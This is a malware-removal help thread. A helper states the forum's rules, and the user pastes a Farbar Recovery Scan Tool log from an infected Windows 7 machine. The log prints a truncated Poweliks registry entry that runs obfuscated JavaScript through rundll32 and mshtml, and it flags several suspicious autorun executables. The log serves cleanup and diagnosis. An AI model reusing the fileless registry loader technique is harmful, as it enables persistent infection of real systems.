Jump to content

Malicious Website Blocked - C:\Windows\SysWOW64\dllhost.exe

MarkL123

By MarkL123
in Resolved Malware Removal Logs

 Share

Recommended Posts

Maniac

Maniac

Posted
Posted

Hello MarkL123 and :welcome:! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend you to keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don’t hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.
P2P/Piracy Warning:

If you're using Peer 2 Peer software such as BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.

Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.

If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.

Link to post
Share on other sites
MarkL123

MarkL123

Posted
  • Author
Posted

FRST.txt

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014

Ran by Mark (administrator) on MININT-LA7T7PK on 05-11-2014 16:33:50

Running from C:\Users\Mark\Desktop

Loaded Profile: Mark (Available profiles: Mark)

Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)

Internet Explorer Version 11

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(AMD) C:\Windows\System32\atiesrxx.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(AMD) C:\Windows\System32\atieclxx.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSView Enterprise\TagSrv.exe

(SEIKO EPSON CORPORATION) C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe

(Seiko Epson Corporation) C:\Windows\System32\escsvc64.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\EventServer.exe

(Acresso Software Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSOPC Gateway\RSOPCGateway.exe

(Acresso Software Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe

(Tanuki Software, Ltd.) C:\Program Files\Inductive Automation\Ignition\IgnitionGateway.exe

(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\flexsvr.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.FTVIEWX64TAGDB\MSSQL\Binn\sqlservr.exe

(Oracle Corporation) C:\Program Files\Java\jre1.8.0_20\bin\java.exe

(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\NmspHost.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RdcyHost.exe

(Rockwell Automation Inc.) C:\Program Files (x86)\Common Files\Rockwell\RNADiagnosticsSrv.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSView Enterprise\HMIDIAGNOSTICSLSTADAPT.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSLinx Enterprise\RSLinxNG.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RsvcHost.exe

(SonicWALL Inc.) C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEService64.exe

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe

(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe

(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(TheGreenBow) C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\vpnconf.exe

(SonicWALL Inc.) C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe

(GlavSoft LLC.) C:\Program Files\TightVNC\tvnserver.exe

(SugarSync, Inc.) C:\Program Files (x86)\SugarSync\SugarSyncManager.exe

(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATILQE.EXE

(Microsoft Corporation) C:\Windows\System32\regsvr32.exe

(Dell) C:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe

(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe

() C:\Program Files (x86)\PST\Binaries\RACurrTray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe

(cyberlink) C:\Program Files (x86)\CyberLink\Shared files\brs.exe

() C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\UsbCipHelper.exe

(SEIKO EPSON CORPORATION) C:\Program Files (x86)\EPSON Software\Event Manager\EEventManager.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe

(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

(TheGreenBow) C:\Windows\SysWOW64\TgbStarter.exe

(GlavSoft LLC.) C:\Program Files\TightVNC\tvnserver.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

(TheGreenBow) C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\tgbike.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\TscHelp.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagPriv.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\EventClientMultiplexer.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\Tools\FTActivationBoost.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagitEditor.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RnaDirServer.exe

(Microsoft Corporation) C:\Windows\splwow64.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

() C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Common Files\Rockwell\RNADirMultiplexor.exe

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe

(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(O2Micro International) C:\Windows\System32\drivers\o2flash.exe

(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe

(Rockwell Automation, Inc.) C:\Program Files (x86)\Rockwell Software\RSCommon\RSOBSERV.EXE

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

 

 

==================== Registry (Whitelisted) ==================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [698712 2013-02-21] (Alps Electric Co., Ltd.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7174728 2013-04-09] (Realtek Semiconductor)

HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1291848 2013-03-22] (Realtek Semiconductor)

HKLM\...\Run: [WavesSvc] => C:\Program Files\Realtek\Audio\HDA\WavesSvc64.exe [114456 2013-02-28] (Waves Audio Ltd.)

HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1291848 2013-03-22] (Realtek Semiconductor)

HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)

HKLM\...\Run: [TgbVpn] => C:\Program Files (x86)\TheGreenBow\TheGreenBow VPN\vpnconf.exe [649904 2011-11-15] (TheGreenBow)

HKLM\...\Run: [sonicWALLNetExtender] => C:\Program Files (x86)\SonicWALL\SSL-VPN\NetExtender\NEGui.exe [1103744 2010-06-22] (SonicWALL Inc.)

HKLM\...\Run: [tvncontrol] => C:\Program Files\TightVNC\tvnserver.exe [2179056 2013-07-19] (GlavSoft LLC.)

HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)

HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)

HKLM-x32\...\Run: [bDRegion] => C:\Program Files (x86)\Cyberlink\Shared Files\brs.exe [75048 2011-08-11] (cyberlink)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-25] (Sonic Solutions)

HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()

HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2011-01-30] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [409744 2009-06-24] (Creative Technology Ltd)

HKLM-x32\...\Run: [usbCipHelper] => C:\Program Files (x86)\Rockwell Automation\UsbCipDriver\UsbCipHelper\UsbCipHelper.exe [434176 2011-10-18] (Rockwell Automation, Inc.)

HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058880 2013-03-28] (SEIKO EPSON CORPORATION)

HKLM-x32\...\Run: [sBRegRebootCleaner] => C:\Program Files (x86)\Sunbelt Software\VIPRE\SBRC.exe

HKLM-x32\...\Run: [vmware-tray.exe] => C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe [112856 2014-06-12] (VMware, Inc.)

HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [507776 2014-07-30] (Oracle Corporation)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [sugarSync] => C:\Program Files (x86)\SugarSync\SugarSyncManager.exe [11241824 2014-01-24] (SugarSync, Inc.)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATILQE.EXE [297024 2013-01-24] (SEIKO EPSON CORPORATION)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d10] => C:\383d109\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [383d109] => C:\Users\Mark\AppData\Roaming\383d109.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YnPack] => C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YnPack\usejdwp.exe <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [YWPack] => regsvr32.exe C:\Users\Mark\AppData\Local\Temp\3770\AppData\Local\YWPack\cygmapMod54.dll <===== ATTENTION

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\Run: [DellSystemDetect] => C:\Users\Mark\AppData\Local\Apps\2.0\50CAB00K.WMW\2TWBM7VC.CKO\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe [254976 2014-04-30] (Dell)

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...\MountPoints2: {86727316-c957-11e3-86f6-534e57000000} - F:\VZW_Software_upgrade_assistant.exe

HKU\S-1-5-21-1491709306-3982533891-1808157286-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RACurrTray.lnk

ShortcutTarget: RACurrTray.lnk -> C:\Program Files (x86)\PST\Binaries\RACurrTray.exe ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk

ShortcutTarget: Snagit 11.lnk -> C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)

ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll (Autodesk, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncBackedUp] -> {0C4A258A-3F3B-4FFF-80A7-9B3BEC139472} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncPending] -> {62CCD8E3-9C21-41E1-B55E-1E26DFC68511} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncRoot] -> {A759AFF6-5851-457D-A540-F4ECED148351} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [sugarSyncShared] -> {1574C9EF-7D58-488F-B358-8B78C1538F51} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll (SugarSync, Inc.)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

URLSearchHook: HKCU - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll No File

BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File

BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_20\bin\ssv.dll (Oracle Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_20\bin\jp2ssv.dll (Oracle Corporation)

BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

BHO-x32: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll No File

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll No File

DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab

DPF: HKLM-x32 {73888E2B-FF04-416C-8847-984D7FC4507F} http://192.168.13.248/RtspVaPgDecNew2.cab

DPF: HKLM-x32 {91B29AFF-E4FF-11D6-8C88-00A0C9D7BBEB} http://www.ab.com/support/abdrives/webupdate/RADriveWebUpdate.cab

DPF: HKLM-x32 {E19E79EC-F62E-40A0-952D-E49AEC7BEC2F} http://192.168.0.100/control/nvA1Media.cab

DPF: HKLM-x32 {FFAD8DA9-ED41-494D-AC8E-63D861D0A733} https://download.rockwellautomation.com/plugins/rockwell.cab

Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File

Handler-x32: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg32.dll No File

Tcpip\Parameters: [DhcpNameServer] 24.116.0.53 24.116.2.50

 

FireFox:

========

FF Plugin: @java.com/DTPlugin,version=11.20.2 -> C:\Program Files\Java\jre1.8.0_20\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF Plugin: @java.com/JavaPlugin,version=11.20.2 -> C:\Program Files\Java\jre1.8.0_20\bin\plugin2\npjp2.dll (Oracle Corporation)

FF Plugin: @microsoft.com/GENUINE -> disabled No File

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)

FF Plugin-x32: @nosltd.com/getPlus+®,version=2.0.7.35 -> C:\Program Files (x86)\NOS\bin\nprockwell.dll (NOS Microsystems Ltd.)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

FF Plugin-x32: @vmware.com/vmrc,version=5.5.0.00000 -> C:\Program Files (x86)\Common Files\VMware\VMware Remote Console Plug-in 5.5\Firefox\np-vmware-vmrc.dll (VMware, Inc.)

FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Mark\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)

FF Plugin HKCU: @jazz-soft.com/JazzPlugin -> C:\Program Files (x86)\Jazz-Soft\Jazz-Plugin\npJazz.dll (Jazz-Soft)

FF Plugin HKCU: LWAPlugin15.8 -> C:\Users\Mark\AppData\Roaming\Mozilla\Plugins\npLWAPlugin15.8.dll (Microsoft Corporation)

FF Plugin ProgramFiles/Appdata: C:\Users\Mark\AppData\Roaming\mozilla\plugins\npLWAPlugin15.8.dll (Microsoft Corporation)

FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files (x86)\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension

 

Chrome:

=======

CHR Profile: C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default

CHR Extension: (Google Docs) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-04-29]

CHR Extension: (Google Drive) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-04-29]

CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-30]

CHR Extension: (YouTube) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-04-29]

CHR Extension: (Google Search) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-04-29]

CHR Extension: (Google Wallet) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-04-29]

CHR Extension: (Gmail) - C:\Users\Mark\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-04-29]

 

==================== Services (Whitelisted) =================

 

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

 

S3 1784-PCIDS DeviceNet; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\PcidsService.exe [109568 2012-06-05] (Rockwell Automation) [File not signed]

S2 CLKMSVC10_9EC60124; C:\Program Files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [248304 2011-08-11] (CyberLink)

S3 EmuLogix 5868 Slot0; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot1; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot10; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot11; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot12; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot13; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot14; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot15; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot16; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot2; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot3; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot4; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot5; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot6; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot7; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot8; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

S3 EmuLogix 5868 Slot9; C:\Program Files (x86)\Rockwell Software\RSLogix Emulate 5000\V15\EmuLogix5868.exe [1425408 2005-07-08] (Rockwell Automation) [File not signed]

R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [144560 2012-05-16] (Seiko Epson Corporation)

R2 FactoryTalk Activation Service; C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe [1122568 2010-05-17] (Acresso Software Inc.)

R2 FactoryTalk Gateway; C:\Program Files (x86)\Rockwell Software\RSOPC Gateway\RSOPCGateway.exe [588136 2011-11-18] (Rockwell Automation, Inc.)

R2 FTActivationBoost; C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\Tools\FTActivationBoost.exe [144744 2011-11-14] (Rockwell Automation, Inc.)

R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)

